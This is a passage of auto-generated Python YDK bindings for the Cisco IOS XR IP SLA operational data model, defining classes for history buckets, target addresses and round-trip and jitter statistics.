self._leafs = OrderedDict([
('life_index', YLeaf(YType.int32, 'life-index')),
])
self.life_index = None
self.buckets = Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets()
self.buckets.parent = self
self._children_name_map["buckets"] = "buckets"
self._children_yang_names.add("buckets")
self._segment_path = lambda: "life" + "[life-index='" + str(self.life_index) + "']"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life, ['life_index'], name, value)
class Buckets(Entity):
"""
Table of history buckets (samples) for a
particular operation
.. attribute:: bucket
History bucket for an operation
**type**\: list of :py:class:`Bucket <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets, self).__init__()
self.yang_name = "buckets"
self.yang_parent_name = "life"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("bucket", ("bucket", Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket))])
self._leafs = OrderedDict()
self.bucket = YList(self)
self._segment_path = lambda: "buckets"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets, [], name, value)
class Bucket(Entity):
"""
History bucket for an operation
.. attribute:: bucket_index (key)
Bucket Index
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: target_address
Target for the operation
**type**\: :py:class:`TargetAddress <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress>`
.. attribute:: start_time
Sample Start Time expressed in msec since00\:00 \:00 UTC, January 1, 1970
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: response_time
Round Trip Time (milliseconds)
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: return_code
Response Return Code
**type**\: :py:class:`IpslaRetCode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaRetCode>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket, self).__init__()
self.yang_name = "bucket"
self.yang_parent_name = "buckets"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['bucket_index']
self._child_container_classes = OrderedDict([("target-address", ("target_address", Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('bucket_index', YLeaf(YType.int32, 'bucket-index')),
('start_time', YLeaf(YType.uint64, 'start-time')),
('response_time', YLeaf(YType.uint32, 'response-time')),
('return_code', YLeaf(YType.enumeration, 'return-code')),
])
self.bucket_index = None
self.start_time = None
self.response_time = None
self.return_code = None
self.target_address = Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress()
self.target_address.parent = self
self._children_name_map["target_address"] = "target-address"
self._children_yang_names.add("target-address")
self._segment_path = lambda: "bucket" + "[bucket-index='" + str(self.bucket_index) + "']"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket, ['bucket_index', 'start_time', 'response_time', 'return_code'], name, value)
class TargetAddress(Entity):
"""
Target for the operation
.. attribute:: ipv4_prefix_target
IPv4 prefix target
**type**\: :py:class:`Ipv4PrefixTarget <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.Ipv4PrefixTarget>`
.. attribute:: tunnel_id_target
Tunnel ID target
**type**\: :py:class:`TunnelIdTarget <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.TunnelIdTarget>`
.. attribute:: ipv4_pseudowire_target
IPv4 pseudowire target
**type**\: :py:class:`Ipv4PseudowireTarget <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.Ipv4PseudowireTarget>`
.. attribute:: target_type
TargetType
**type**\: :py:class:`IpslaTargetTypeEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaTargetTypeEnum>`
.. attribute:: ipv4_address_target
IPv4 address target
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: ipv6_address_target
IPv6 address target
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress, self).__init__()
self.yang_name = "target-address"
self.yang_parent_name = "bucket"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("ipv4-prefix-target", ("ipv4_prefix_target", Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.Ipv4PrefixTarget)), ("tunnel-id-target", ("tunnel_id_target", Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.TunnelIdTarget)), ("ipv4-pseudowire-target", ("ipv4_pseudowire_target", Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.Ipv4PseudowireTarget))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('target_type', YLeaf(YType.enumeration, 'target-type')),
('ipv4_address_target', YLeaf(YType.str, 'ipv4-address-target')),
('ipv6_address_target', YLeaf(YType.str, 'ipv6-address-target')),
])
self.target_type = None
self.ipv4_address_target = None
self.ipv6_address_target = None
self.ipv4_prefix_target = Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.Ipv4PrefixTarget()
self.ipv4_prefix_target.parent = self
self._children_name_map["ipv4_prefix_target"] = "ipv4-prefix-target"
self._children_yang_names.add("ipv4-prefix-target")
self.tunnel_id_target = Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.TunnelIdTarget()
self.tunnel_id_target.parent = self
self._children_name_map["tunnel_id_target"] = "tunnel-id-target"
self._children_yang_names.add("tunnel-id-target")
self.ipv4_pseudowire_target = Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.Ipv4PseudowireTarget()
self.ipv4_pseudowire_target.parent = self
self._children_name_map["ipv4_pseudowire_target"] = "ipv4-pseudowire-target"
self._children_yang_names.add("ipv4-pseudowire-target")
self._segment_path = lambda: "target-address"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress, ['target_type', 'ipv4_address_target', 'ipv6_address_target'], name, value)
class Ipv4PrefixTarget(Entity):
"""
IPv4 prefix target
.. attribute:: address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: mask_length
Mask length
**type**\: int
**range:** 0..255
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.Ipv4PrefixTarget, self).__init__()
self.yang_name = "ipv4-prefix-target"
self.yang_parent_name = "target-address"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('address', YLeaf(YType.str, 'address')),
('mask_length', YLeaf(YType.uint8, 'mask-length')),
])
self.address = None
self.mask_length = None
self._segment_path = lambda: "ipv4-prefix-target"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.Ipv4PrefixTarget, ['address', 'mask_length'], name, value)
class TunnelIdTarget(Entity):
"""
Tunnel ID target
.. attribute:: tunnel_id
Tunnel ID
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.TunnelIdTarget, self).__init__()
self.yang_name = "tunnel-id-target"
self.yang_parent_name = "target-address"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('tunnel_id', YLeaf(YType.uint32, 'tunnel-id')),
])
self.tunnel_id = None
self._segment_path = lambda: "tunnel-id-target"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.TunnelIdTarget, ['tunnel_id'], name, value)
class Ipv4PseudowireTarget(Entity):
"""
IPv4 pseudowire target
.. attribute:: address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: virtual_circuit_id
Virtual circuit ID
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.Ipv4PseudowireTarget, self).__init__()
self.yang_name = "ipv4-pseudowire-target"
self.yang_parent_name = "target-address"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('address', YLeaf(YType.str, 'address')),
('virtual_circuit_id', YLeaf(YType.uint32, 'virtual-circuit-id')),
])
self.address = None
self.virtual_circuit_id = None
self._segment_path = lambda: "ipv4-pseudowire-target"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.History.Target.Lifes.Life.Buckets.Bucket.TargetAddress.Ipv4PseudowireTarget, ['address', 'virtual_circuit_id'], name, value)
class Statistics(Entity):
"""
Statistics collected for an operation
.. attribute:: latest
Statistics collected during the last sampling cycle of the operation
**type**\: :py:class:`Latest <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest>`
.. attribute:: aggregated
Statistics aggregated for data collected over time intervals
**type**\: :py:class:`Aggregated <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics, self).__init__()
self.yang_name = "statistics"
self.yang_parent_name = "operation"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("latest", ("latest", Ipsla.OperationData.Operations.Operation.Statistics.Latest)), ("aggregated", ("aggregated", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.latest = Ipsla.OperationData.Operations.Operation.Statistics.Latest()
self.latest.parent = self
self._children_name_map["latest"] = "latest"
self._children_yang_names.add("latest")
self.aggregated = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated()
self.aggregated.parent = self
self._children_name_map["aggregated"] = "aggregated"
self._children_yang_names.add("aggregated")
self._segment_path = lambda: "statistics"
class Latest(Entity):
"""
Statistics collected during the last
sampling cycle of the operation
.. attribute:: target
Latest statistics for the target node
**type**\: :py:class:`Target <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target>`
.. attribute:: hops
Latest statistics for hops in a path\-enabled operation
**type**\: :py:class:`Hops <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops>`
.. attribute:: lpd_paths
List of latest LPD paths
**type**\: :py:class:`LpdPaths <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest.LpdPaths>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Latest, self).__init__()
self.yang_name = "latest"
self.yang_parent_name = "statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("target", ("target", Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target)), ("hops", ("hops", Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops)), ("lpd-paths", ("lpd_paths", Ipsla.OperationData.Operations.Operation.Statistics.Latest.LpdPaths))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.target = Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target()
self.target.parent = self
self._children_name_map["target"] = "target"
self._children_yang_names.add("target")
self.hops = Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops()
self.hops.parent = self
self._children_name_map["hops"] = "hops"
self._children_yang_names.add("hops")
self.lpd_paths = Ipsla.OperationData.Operations.Operation.Statistics.Latest.LpdPaths()
self.lpd_paths.parent = self
self._children_name_map["lpd_paths"] = "lpd-paths"
self._children_yang_names.add("lpd-paths")
self._segment_path = lambda: "latest"
class Target(Entity):
"""
Latest statistics for the target node
.. attribute:: common_stats
Common Stats
**type**\: :py:class:`CommonStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.CommonStats>`
.. attribute:: specific_stats
Operation Specific Stats
**type**\: :py:class:`SpecificStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target, self).__init__()
self.yang_name = "target"
self.yang_parent_name = "latest"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("common-stats", ("common_stats", Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.CommonStats)), ("specific-stats", ("specific_stats", Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.common_stats = Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.CommonStats()
self.common_stats.parent = self
self._children_name_map["common_stats"] = "common-stats"
self._children_yang_names.add("common-stats")
self.specific_stats = Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats()
self.specific_stats.parent = self
self._children_name_map["specific_stats"] = "specific-stats"
self._children_yang_names.add("specific-stats")
self._segment_path = lambda: "target"
class CommonStats(Entity):
"""
Common Stats
.. attribute:: operation_time
Operation Time
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: return_code
Return code
**type**\: :py:class:`IpslaRetCode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaRetCode>`
.. attribute:: response_time_count
Number of RTT samples used for the statistics
**type**\: int
**range:** 0..4294967295
.. attribute:: response_time
RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: min_response_time
Minimum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: max_response_time
Maximum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum_response_time
Sum of RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum2_response_time
Sum of RTT^2
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: update_count
Number of updates processed
**type**\: int
**range:** 0..4294967295
.. attribute:: ok_count
Number of updates with Okay return code
**type**\: int
**range:** 0..4294967295
.. attribute:: disconnect_count
Number of updates with Disconnected return code
**type**\: int
**range:** 0..4294967295
.. attribute:: timeout_count
Number of updates with Timeout return code
**type**\: int
**range:** 0..4294967295
.. attribute:: busy_count
Number of updates with Busy return code
**type**\: int
**range:** 0..4294967295
.. attribute:: no_connection_count
Number of updates with NotConnected return code
**type**\: int
**range:** 0..4294967295
.. attribute:: dropped_count
Number of updates with Dropped return code
**type**\: int
**range:** 0..4294967295
.. attribute:: internal_error_count
Number of updates with InternalError return code
**type**\: int
**range:** 0..4294967295
.. attribute:: sequence_error_count
Number of updates with SeqError return code
**type**\: int
**range:** 0..4294967295
.. attribute:: verify_error_count
Number of updates with VerifyError return code
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.CommonStats, self).__init__()
self.yang_name = "common-stats"
self.yang_parent_name = "target"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('operation_time', YLeaf(YType.uint64, 'operation-time')),
('return_code', YLeaf(YType.enumeration, 'return-code')),
('response_time_count', YLeaf(YType.uint32, 'response-time-count')),
('response_time', YLeaf(YType.uint32, 'response-time')),
('min_response_time', YLeaf(YType.uint32, 'min-response-time')),
('max_response_time', YLeaf(YType.uint32, 'max-response-time')),
('sum_response_time', YLeaf(YType.uint32, 'sum-response-time')),
('sum2_response_time', YLeaf(YType.uint64, 'sum2-response-time')),
('update_count', YLeaf(YType.uint32, 'update-count')),
('ok_count', YLeaf(YType.uint32, 'ok-count')),
('disconnect_count', YLeaf(YType.uint32, 'disconnect-count')),
('timeout_count', YLeaf(YType.uint32, 'timeout-count')),
('busy_count', YLeaf(YType.uint32, 'busy-count')),
('no_connection_count', YLeaf(YType.uint32, 'no-connection-count')),
('dropped_count', YLeaf(YType.uint32, 'dropped-count')),
('internal_error_count', YLeaf(YType.uint32, 'internal-error-count')),
('sequence_error_count', YLeaf(YType.uint32, 'sequence-error-count')),
('verify_error_count', YLeaf(YType.uint32, 'verify-error-count')),
])
self.operation_time = None
self.return_code = None
self.response_time_count = None
self.response_time = None
self.min_response_time = None
self.max_response_time = None
self.sum_response_time = None
self.sum2_response_time = None
self.update_count = None
self.ok_count = None
self.disconnect_count = None
self.timeout_count = None
self.busy_count = None
self.no_connection_count = None
self.dropped_count = None
self.internal_error_count = None
self.sequence_error_count = None
self.verify_error_count = None
self._segment_path = lambda: "common-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.CommonStats, ['operation_time', 'return_code', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'update_count', 'ok_count', 'disconnect_count', 'timeout_count', 'busy_count', 'no_connection_count', 'dropped_count', 'internal_error_count', 'sequence_error_count', 'verify_error_count'], name, value)
class SpecificStats(Entity):
"""
Operation Specific Stats
.. attribute:: icmp_path_jitter_stats
icmp path jitter stats
**type**\: :py:class:`IcmpPathJitterStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats.IcmpPathJitterStats>`
.. attribute:: udp_jitter_stats
udp jitter stats
**type**\: :py:class:`UdpJitterStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats.UdpJitterStats>`
.. attribute:: op_type
op type
**type**\: :py:class:`OpTypeEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.OpTypeEnum>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats, self).__init__()
self.yang_name = "specific-stats"
self.yang_parent_name = "target"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("icmp-path-jitter-stats", ("icmp_path_jitter_stats", Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats.IcmpPathJitterStats)), ("udp-jitter-stats", ("udp_jitter_stats", Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats.UdpJitterStats))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('op_type', YLeaf(YType.enumeration, 'op-type')),
])
self.op_type = None
self.icmp_path_jitter_stats = Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats.IcmpPathJitterStats()
self.icmp_path_jitter_stats.parent = self
self._children_name_map["icmp_path_jitter_stats"] = "icmp-path-jitter-stats"
self._children_yang_names.add("icmp-path-jitter-stats")
self.udp_jitter_stats = Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats.UdpJitterStats()
self.udp_jitter_stats.parent = self
self._children_name_map["udp_jitter_stats"] = "udp-jitter-stats"
self._children_yang_names.add("udp-jitter-stats")
self._segment_path = lambda: "specific-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats, ['op_type'], name, value)
class IcmpPathJitterStats(Entity):
"""
icmp path jitter stats
.. attribute:: source_address
IP Address of the source
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: dest_address
IP Address of the destination
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: hop_address
IP address of the hop in the path
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: packet_interval
Interval between echos in ms
**type**\: int
**range:** 0..4294967295
.. attribute:: response_time_count
Number of RTT samples used for the statistics
**type**\: int
**range:** 0..4294967295
.. attribute:: response_time
RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: min_response_time
Minimum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: max_response_time
Maximum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum_response_time
Sum of RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum2_response_time
Sum of RTT^2
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: packet_count
Number of Echo replies received
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_loss_count
Number of packets lost
**type**\: int
**range:** 0..4294967295
.. attribute:: out_of_sequence_count
Number of out of sequence packets
**type**\: int
**range:** 0..4294967295
.. attribute:: discarded_sample_count
Number of discarded samples
**type**\: int
**range:** 0..4294967295
.. attribute:: verify_errors_count
Number of packets with data corruption
**type**\: int
**range:** 0..4294967295
.. attribute:: dropped_error_count
Number of packets dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: jitter
Jitter value for this node in the path
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_sum
Sum of positive jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_sum2
Sum of squares of positive jitter values
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pos_jitter_min
Minimum positive jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_max
Maximum positive jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_count
Number of positive jitter values
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_sum
Sum of negative jitter values
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_min
Minimum negative jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_max
Maximum negative jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_sum2
Sum of squares of negative jitter values
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: neg_jitter_count
Number of negative jitter values
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats.IcmpPathJitterStats, self).__init__()
self.yang_name = "icmp-path-jitter-stats"
self.yang_parent_name = "specific-stats"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('source_address', YLeaf(YType.str, 'source-address')),
('dest_address', YLeaf(YType.str, 'dest-address')),
('hop_address', YLeaf(YType.str, 'hop-address')),
('packet_interval', YLeaf(YType.uint32, 'packet-interval')),
('response_time_count', YLeaf(YType.uint32, 'response-time-count')),
('response_time', YLeaf(YType.uint32, 'response-time')),
('min_response_time', YLeaf(YType.uint32, 'min-response-time')),
('max_response_time', YLeaf(YType.uint32, 'max-response-time')),
('sum_response_time', YLeaf(YType.uint32, 'sum-response-time')),
('sum2_response_time', YLeaf(YType.uint64, 'sum2-response-time')),
('packet_count', YLeaf(YType.uint32, 'packet-count')),
('packet_loss_count', YLeaf(YType.uint32, 'packet-loss-count')),
('out_of_sequence_count', YLeaf(YType.uint32, 'out-of-sequence-count')),
('discarded_sample_count', YLeaf(YType.uint32, 'discarded-sample-count')),
('verify_errors_count', YLeaf(YType.uint32, 'verify-errors-count')),
('dropped_error_count', YLeaf(YType.uint32, 'dropped-error-count')),
('jitter', YLeaf(YType.uint32, 'jitter')),
('pos_jitter_sum', YLeaf(YType.uint32, 'pos-jitter-sum')),
('pos_jitter_sum2', YLeaf(YType.uint64, 'pos-jitter-sum2')),
('pos_jitter_min', YLeaf(YType.uint32, 'pos-jitter-min')),
('pos_jitter_max', YLeaf(YType.uint32, 'pos-jitter-max')),
('pos_jitter_count', YLeaf(YType.uint32, 'pos-jitter-count')),
('neg_jitter_sum', YLeaf(YType.uint32, 'neg-jitter-sum')),
('neg_jitter_min', YLeaf(YType.uint32, 'neg-jitter-min')),
('neg_jitter_max', YLeaf(YType.uint32, 'neg-jitter-max')),
('neg_jitter_sum2', YLeaf(YType.uint64, 'neg-jitter-sum2')),
('neg_jitter_count', YLeaf(YType.uint32, 'neg-jitter-count')),
])
self.source_address = None
self.dest_address = None
self.hop_address = None
self.packet_interval = None
self.response_time_count = None
self.response_time = None
self.min_response_time = None
self.max_response_time = None
self.sum_response_time = None
self.sum2_response_time = None
self.packet_count = None
self.packet_loss_count = None
self.out_of_sequence_count = None
self.discarded_sample_count = None
self.verify_errors_count = None
self.dropped_error_count = None
self.jitter = None
self.pos_jitter_sum = None
self.pos_jitter_sum2 = None
self.pos_jitter_min = None
self.pos_jitter_max = None
self.pos_jitter_count = None
self.neg_jitter_sum = None
self.neg_jitter_min = None
self.neg_jitter_max = None
self.neg_jitter_sum2 = None
self.neg_jitter_count = None
self._segment_path = lambda: "icmp-path-jitter-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats.IcmpPathJitterStats, ['source_address', 'dest_address', 'hop_address', 'packet_interval', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'packet_count', 'packet_loss_count', 'out_of_sequence_count', 'discarded_sample_count', 'verify_errors_count', 'dropped_error_count', 'jitter', 'pos_jitter_sum', 'pos_jitter_sum2', 'pos_jitter_min', 'pos_jitter_max', 'pos_jitter_count', 'neg_jitter_sum', 'neg_jitter_min', 'neg_jitter_max', 'neg_jitter_sum2', 'neg_jitter_count'], name, value)
class UdpJitterStats(Entity):
"""
udp jitter stats
.. attribute:: jitter_in
Input Jitter moving average, computed as per RFC1889
**type**\: int
**range:** 0..4294967295
.. attribute:: jitter_out
Output Jitter moving average, computed as per RFC1889
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_loss_sd
